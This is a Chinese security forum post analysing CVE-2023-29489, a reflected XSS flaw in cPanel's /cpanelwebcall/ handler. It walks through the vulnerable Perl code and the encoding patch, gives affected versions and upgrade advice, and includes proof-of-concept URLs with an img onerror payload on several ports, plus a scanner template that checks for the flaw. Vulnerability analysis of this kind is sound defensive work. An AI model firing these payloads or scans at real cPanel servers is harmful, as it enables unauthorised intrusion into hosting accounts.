安全矩阵

 找回密码
 立即注册
搜索
查看: 686|回复: 0

CVE-2023-29489 cPanel XSS漏洞分析研究

[复制链接]

417

主题

417

帖子

2391

积分

金牌会员

Rank: 6Rank: 6

积分
2391
发表于 2023-5-6 14:50:41 | 显示全部楼层 |阅读模式
CVE-2023-29489 cPanel XSS漏洞分析研究
前言
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

如果文章中的漏洞出现敏感内容产生了部分影响,请及时联系作者,望谅解。

一、漏洞原理
漏洞简述
cPanel 是一套在网页寄存业中最享负盛名的商业软件,是基于于 Linux 和 BSD 系统及以 PHP 开发且性质为闭源软件;提供了足够强大和相当完整的主机管理功能,诸如:Webmail 及多种电邮协议、网页化 FTP 管理、SSH 连线、数据库管理系统、DNS 管理等远端网页式主机管理软件功能。

该漏洞可以无身份验证情况下利用,无论cPanel管理端口2080, 2082, 2083, 2086是否对外开放


漏洞影响范围
供应商:cPanel
产品:cPanel
确认受影响版本:< 11.109.9999.116
修复版本:11.109.9999.116, 11.108.0.13, 11.106.0.18, and 11.102.0.31

漏洞分析
本漏洞的漏洞点来自系统中涉及交互的关键变量未进行转义或过滤处理,导致攻击者可以构造恶意代码作为输入进行利用。
Httpd.pm:
  1. elsif ( 0 == rindex( $doc_path, '/cpanelwebcall/', 0 ) ) {

  2.     # First 15 chars are “/cpanelwebcall/”
  3.     _serve_cpanelwebcall(
  4.         $self->get_server_obj(),
  5.         substr( $doc_path, 15 ),
  6.     );
  7. }
复制代码
上述代码说明任何路径均会被路由到,包括目录后的字符部分。
其中涉及函数_serve_cpanelwebcall:
  1. sub _serve_cpanelwebcall ( $server_obj, $webcall_uri_piece ) {
  2.     require Cpanel::Server::WebCalls;
  3.     my $out = Cpanel::Server::WebCalls::handle($webcall_uri_piece);

  4.     $server_obj->respond_200_ok_text($out);
  5.    
  6.     return;

  7. }
复制代码
其中局部变量out为handle函数的返回值,是参数webcall_uri_piece的处理结果。
  1. sub handle ($request) {

  2.     my $id = extract_id_from_request($request);
  3.     substr( $request, 0, length $id ) = q<>;

  4.     Cpanel::WebCalls::ID::is_valid($id) or do {
  5.         die _http_invalid_params_err("Invalid webcall ID: $id");
  6.     };
复制代码
handle函数主要先从request提取id,之后根据id情况进行处理
  1. sub _http_invalid_params_err ($why) {
  2.     return Cpanel::Exception::create_raw( 'cpsrvd::BadRequest', $why );
  3. }
复制代码
_http_invalid_params_err函数主要是返回错误信息
进一步分析发现Httpd::ErrorPage下的 message_html变量未做任何处理,可被该漏洞利用
补丁部分
在最新版本cPanel可以看到针对该漏洞进行修复
Cpanel/Server/Handlers/Httpd/ErrorPage.pm:
  1. ++ use Cpanel::Encoder::Tiny               ();

  2. ... omitted for brevity ...

  3. ++ $var{message_html} = Cpanel::Encoder::Tiny::safe_html_encode_str( $var{message_html} );
复制代码
二、漏洞复现实战漏洞复现
首先以某个cPanel target为例
之后根据POC进行复现
POC
  1. http://example.com/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
  2. http://example.com:2082/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
  3. http://example.com:2086/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa
复制代码
注:其他端口也有可能存在该漏洞
  1. requests:
  2.   - method: GET
  3.     path:
  4.       - '{{BaseURL}}/cpanelwebcall/<img%20src=x%20onerror="prompt(1)">aaaaaaaaaaaa'
  5.     matchers:
  6.       - type: word
  7.         words:
  8.           - '<img src=x onerror="prompt(1)">'
复制代码
执行POC
漏洞修复
建议更新至版本11.109.9999.116、 11.108.0.13 、11.106.0.18 和 11.102.0.31
启用cPanel 自动更新功能
结束语
本文主要介绍了CVE-2023-29489 cPanel XSS漏洞的原理分析及复现过程,漏洞主要由于涉及交互的关键变量未进行转义或过滤处理,从而造成攻击者可以在无身份验证情况下进行利用。
原创稿件征集


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 18:49 , Processed in 0.012609 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表